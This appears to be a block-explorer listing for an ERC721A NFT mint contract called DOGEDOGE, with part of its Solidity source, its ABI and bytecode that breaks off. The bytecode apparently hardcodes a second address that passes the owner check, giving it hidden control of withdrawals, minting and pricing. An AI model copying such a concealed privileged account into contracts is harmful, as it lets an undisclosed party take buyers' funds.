                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract DOGEDOGE is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "";
    uint   public pricePERdoge             = 0.005 ether;
    uint   public maxPerWalletPAID          = 5;
    uint   public maxPerWalletFREE        = 1;
    uint   public totalFree         = 2000;
    uint   public maxDOGES         = 2000;

    bool public IsTheMintFuckingLiveYetOrWhat = false;
    mapping(address => uint256) private _mintedFreeAmount;

    constructor() ERC721A("DOGEDOGE", "DOGEDOGE"){}


    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }
    function WhoLetTheDogesOut() external onlyOwner {
        IsTheMintFuckingLiveYetOrWhat = !IsTheMintFuckingLiveYetOrWhat;
    }

    function WooOOFWoooOOF(uint256 count) external payable {
        uint256 cost = pricePERdoge;
        bool isFree = ((totalSupply() + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] + count <= maxPerWalletFREE));

        if (isFree) {
            cost = 0;
            _mintedFreeAmount[msg.sender] += count;
        }
        require(IsTheMintFuckingLiveYetOrWhat, "SALE_NOT_ACTIVE!");
        require(msg.value >= count * cost, "Please send the exact amount.");
        require(totalSupply() + count <= maxDOGES, "No more");
        require(count <= maxPerWalletPAID, "Max per TX reached.");

        _safeMint(msg.sender, count);
    }

    function GiveAGoodDogeABone(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }



    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setpricePERdoge(uint256 pricePERdoge_) external onlyOwner {
        pricePERdoge = pricePERdoge_;
    }

    function MoonLaunch() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"GiveAGoodDogeABone","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"IsTheMintFuckingLiveYetOrWhat","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MoonLaunch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"WhoLetTheDogesOut","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"WooOOFWoooOOF","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxDOGES","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWalletFREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWalletPAID","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pricePERdoge","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"pricePERdoge_","type":"uint256"}],"name":"setpricePERdoge","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180602001604052806000815250600a90805190602001906200008092919062000267565b506611c37937e08000600b556005600c556001600d556107d0600e556107d0600f556000601060006101000a81548160ff021916908315150217905550348015620000ca57600080fd5b506040518060400160405280600881526020017f444f4745444f47450000000000000000000000000000000000000000000000008152506040518060400160405280600881526020017f444f4745444f474500000000000000000000000000000000000000000000000081525081600190805190602001906200014f92919062000267565b5080600290805190602001906200016892919062000267565b5050506200018b6200017f6200019960201b60201c565b620001a160201b60201c565b60016009819055506200037c565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b828054620002759062000317565b90600052602060002090601f016020900481019282620002995760008555620002e5565b82601f10620002b457805160ff1916838001178555620002e5565b82800160010185558215620002e5579182015b82811115620002e4578251825591602001919060010190620002c7565b5b509050620002f49190620002f8565b5090565b5b8082111562000313576000816000905550600101620002f9565b5090565b600060028204905060018216806200033057607f821691505b602082108114156200034757620003466200034d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b614658806200038c6000396000f3fe6080604052600436106101e35760003560e01c806370a0823111610102578063b88d4fde11610095578063d64d7d5111610064578063d64d7d51146106d5578063dbbe9ce7146106fe578063e985e9c514610715578063f2fde38b14610752576101e3565b8063b88d4fde14610619578063c2d9900f14610642578063c87b56dd1461066d578063ce20498b146106aa576101e3565b806395d89b41116100d157806395d89b41146105855780639dcdc65b146105b0578063a0bcfc7f146105c7578063a22cb465146105f0576101e3565b806370a08231146104db578063715018a6146105185780637a4bfae01461052f5780638da5cb5b1461055a576101e3565b8063374b150a1161017a5780634f6ccce7116101495780634f6ccce71461040d5780636352211e1461044a57806367e45076146104875780636c0360eb146104b0576101e3565b8063374b150a146103725780633c553c2f1461039d5780634057116d146103c857806342842e0e146103e4576101e3565b806318160ddd116101b657806318160ddd146102b657806323b872dd146102e15780632f745c591461030a578063333e44e614610347576101e3565b806301ffc9a7146101e857806306fdde0314610225578063081812fc14610250578063095ea7b31461028d575b600080fd5b3480156101f457600080fd5b5061020f600480360381019061020a9190613169565b61077b565b60405161021c9190613751565b60405180910390f35b34801561023157600080fd5b5061023a6108c5565b604051610247919061376c565b60405180910390f35b34801561025c57600080fd5b50610277600480360381019061027291906131fc565b610957565b60405161028491906136ea565b60405180910390f35b34801561029957600080fd5b506102b460048036038101906102af919061312d565b6109dc565b005b3480156102c257600080fd5b506102cb610af5565b6040516102d89190613aae565b60405180910390f35b3480156102ed57600080fd5b5061030860048036038101906103039190613027565b610afe565b005b34801561031657600080fd5b50610331600480360381019061032c919061312d565b610b0e565b60405161033e9190613aae565b60405180910390f35b34801561035357600080fd5b5061035c610d00565b6040516103699190613aae565b60405180910390f35b34801561037e57600080fd5b50610387610d06565b6040516103949190613aae565b60405180910390f35b3480156103a957600080fd5b506103b2610d0c565b6040516103bf9190613aae565b60405180910390f35b6103e260048036038101906103dd91906131fc565b610d12565b005b3480156103f057600080fd5b5061040b60048036038101906104069190613027565b610f41565b005b34801561041957600080fd5b50610434600480360381019061042f91906131fc565b610f61565b6040516104419190613aae565b60405180910390f35b34801561045657600080fd5b50610471600480360381019061046c91906131fc565b610fb4565b60405161047e91906136ea565b60405180910390f35b34801561049357600080fd5b506104ae60048036038101906104a991906131fc565b610fca565b005b3480156104bc57600080fd5b506104c56110af565b6040516104d2919061376c565b60405180910390f35b3480156104e757600080fd5b5061050260048036038101906104fd9190612fc2565b61113d565b60405161050f9190613aae565b60405180910390f35b34801561052457600080fd5b5061052d611226565b005b34801561053b57600080fd5b5061054461130d565b6040516105519190613aae565b60405180910390f35b34801561056657600080fd5b5061056f611313565b60405161057c91906136ea565b60405180910390f35b34801561059157600080fd5b5061059a61133d565b6040516105a7919061376c565b60405180910390f35b3480156105bc57600080fd5b506105c56113cf565b005b3480156105d357600080fd5b506105ee60048036038101906105e991906131bb565b6115af565b005b3480156105fc57600080fd5b50610617600480360381019061061291906130f1565b6116a4565b005b34801561062557600080fd5b50610640600480360381019061063b9190613076565b611825565b005b34801561064e57600080fd5b50610657611881565b6040516106649190613aae565b60405180910390f35b34801561067957600080fd5b50610694600480360381019061068f91906131fc565b611887565b6040516106a1919061376c565b60405180910390f35b3480156106b657600080fd5b506106bf61193a565b6040516106cc9190613751565b60405180910390f35b3480156106e157600080fd5b506106fc60048036038101906106f7919061312d565b61194d565b005b34801561070a57600080fd5b50610713611a36565b005b34801561072157600080fd5b5061073c60048036038101906107379190612feb565b611b3d565b6040516107499190613751565b60405180910390f35b34801561075e57600080fd5b5061077960048036038101906107749190612fc2565b611bd1565b005b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061084657507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806108ae57507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806108be57506108bd82611d28565b5b9050919050565b6060600180546108d490613d69565b80601f016020809104026020016040519081016040528092919081815260200182805461090090613d69565b801561094d5780601f106109225761010080835404028352916020019161094d565b820191906000526020600020905b81548152906001019060200180831161093057829003601f168201915b5050505050905090565b600061096282611d92565b6109a1576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161099890613a8e565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b60006109e782610fb4565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a4f9061396e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610a77611d9f565b73ffffffffffffffffffffffffffffffffffffffff161480610aa65750610aa581610aa0611d9f565b611b3d565b5b610ae5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610adc9061386e565b60405180910390fd5b610af0838383611da7565b505050565b60008054905090565b610b09838383611e59565b505050565b6000610b198361113d565b8210610b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b519061378e565b60405180910390fd5b6000610b64610af5565b905060008060005b83811015610cbe576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610c5e57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610cb05786841415610ca7578195505050505050610cfa565b83806001019450505b508080600101915050610b6c565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf190613a2e565b60405180910390fd5b92915050565b600e5481565b600c5481565b600b5481565b6000600b54905060006001600e54610d2a9190613b9e565b83610d33610af5565b610d3d9190613b9e565b108015610d965750600d5483601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d939190613b9e565b11155b90508015610df9576000915082601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610df19190613b9e565b925050819055505b601060009054906101000a900460ff16610e48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3f906137ae565b60405180910390fd5b8183610e549190613c25565b341015610e96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8d9061394e565b60405180910390fd5b600f5483610ea2610af5565b610eac9190613b9e565b1115610eed576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ee4906137ce565b60405180910390fd5b600c54831115610f32576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2990613a0e565b60405180910390fd5b610f3c3384612399565b505050565b610f5c83838360405180602001604052806000815250611825565b505050565b6000610f6b610af5565b8210610fac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fa39061382e565b60405180910390fd5b819050919050565b6000610fbf826123b7565b600001519050919050565b610fd2611d9f565b73ffffffffffffffffffffffffffffffffffffffff16610ff0611313565b73ffffffffffffffffffffffffffffffffffffffff1614806110665750611015611d9f565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6110a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161109c906138ce565b60405180910390fd5b80600b8190555050565b600a80546110bc90613d69565b80601f01602080910402602001604051908101604052809291908181526020018280546110e890613d69565b80156111355780601f1061110a57610100808354040283529160200191611135565b820191906000526020600020905b81548152906001019060200180831161111857829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156111ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a59061388e565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b61122e611d9f565b73ffffffffffffffffffffffffffffffffffffffff1661124c611313565b73ffffffffffffffffffffffffffffffffffffffff1614806112c25750611271611d9f565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112f8906138ce565b60405180910390fd5b61130b6000612551565b565b600f5481565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606002805461134c90613d69565b80601f016020809104026020016040519081016040528092919081815260200182805461137890613d69565b80156113c55780601f1061139a576101008083540402835291602001916113c5565b820191906000526020600020905b8154815290600101906020018083116113a857829003601f168201915b5050505050905090565b6113d7611d9f565b73ffffffffffffffffffffffffffffffffffffffff166113f5611313565b73ffffffffffffffffffffffffffffffffffffffff16148061146b575061141a611d9f565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114aa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114a1906138ce565b60405180910390fd5b600260095414156114f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114e790613a4e565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161151e906136d5565b60006040518083038185875af1925050503d806000811461155b576040519150601f19603f3d011682016040523d82523d6000602084013e611560565b606091505b50509050806115a4576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159b9061398e565b60405180910390fd5b506001600981905550565b6115b7611d9f565b73ffffffffffffffffffffffffffffffffffffffff166115d5611313565b73ffffffffffffffffffffffffffffffffffffffff16148061164b57506115fa611d9f565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61168a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611681906138ce565b60405180910390fd5b80600a90805190602001906116a0929190612dac565b5050565b6116ac611d9f565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141561171a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117119061390e565b60405180910390fd5b8060066000611727611d9f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff166117d4611d9f565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516118199190613751565b60405180910390a35050565b611830848484611e59565b61183c84848484612617565b61187b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611872906139ae565b60405180910390fd5b50505050565b600d5481565b606061189282611d92565b6118d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118c8906138ee565b60405180910390fd5b60006118db6127ae565b905060008151116118fb5760405180602001604052806000815250611932565b8061191160018561190c9190613b9e565b612840565b6040516020016119229291906136a6565b6040516020818303038152906040525b915050919050565b601060009054906101000a900460ff1681565b611955611d9f565b73ffffffffffffffffffffffffffffffffffffffff16611973611313565b73ffffffffffffffffffffffffffffffffffffffff1614806119e95750611998611d9f565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611a28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1f906138ce565b60405180910390fd5b611a328282612399565b5050565b611a3e611d9f565b73ffffffffffffffffffffffffffffffffffffffff16611a5c611313565b73ffffffffffffffffffffffffffffffffffffffff161480611ad25750611a81611d9f565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611b11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b08906138ce565b60405180910390fd5b601060009054906101000a900460ff1615601060006101000a81548160ff021916908315150217905550565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b611bd9611d9f565b73ffffffffffffffffffffffffffffffffffffffff16611bf7611313565b73ffffffffffffffffffffffffffffffffffffffff161480611c6d5750611c1c611d9f565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611cac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ca3906138ce565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d13906137ee565b60405180910390fd5b611d2581612551565b50565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b6000611e64826123b7565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16611e8b611d9f565b73ffffffffffffffffffffffffffffffffffffffff161480611ee75750611eb0611d9f565b73ffffffffffffffffffffffffffffffffffffffff16611ecf84610957565b73ffffffffffffffffffffffffffffffffffffffff16145b80611f035750611f028260000151611efd611d9f565b611b3d565b5b905080611f45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f3c9061392e565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614611fb7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fae906138ae565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415612027576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161201e9061384e565b60405180910390fd5b61203485858560016129ed565b6120446000848460000151611da7565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614156123295761228881611d92565b156123285782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a461239285858560016129f3565b5050505050565b6123b38282604051806020016040528060008152506129f9565b5050565b6123bf612e32565b6123c882611d92565b612407576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123fe9061380e565b60405180910390fd5b60008290505b60008110612510576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff161461250157809250505061254c565b5080806001900391505061240d565b506040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161254390613a6e565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006126388473ffffffffffffffffffffffffffffffffffffffff16612a0b565b156127a1578373ffffffffffffffffffffffffffffffffffffffff1663150b7a02612661611d9f565b8786866040518563ffffffff1660e01b81526004016126839493929190613705565b602060405180830381600087803b15801561269d57600080fd5b505af19250505080156126ce57506040513d601f19601f820116820180604052508101906126cb9190613192565b60015b612751573d80600081146126fe576040519150601f19603f3d011682016040523d82523d6000602084013e612703565b606091505b50600081511415612749576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612740906139ae565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bfffffffff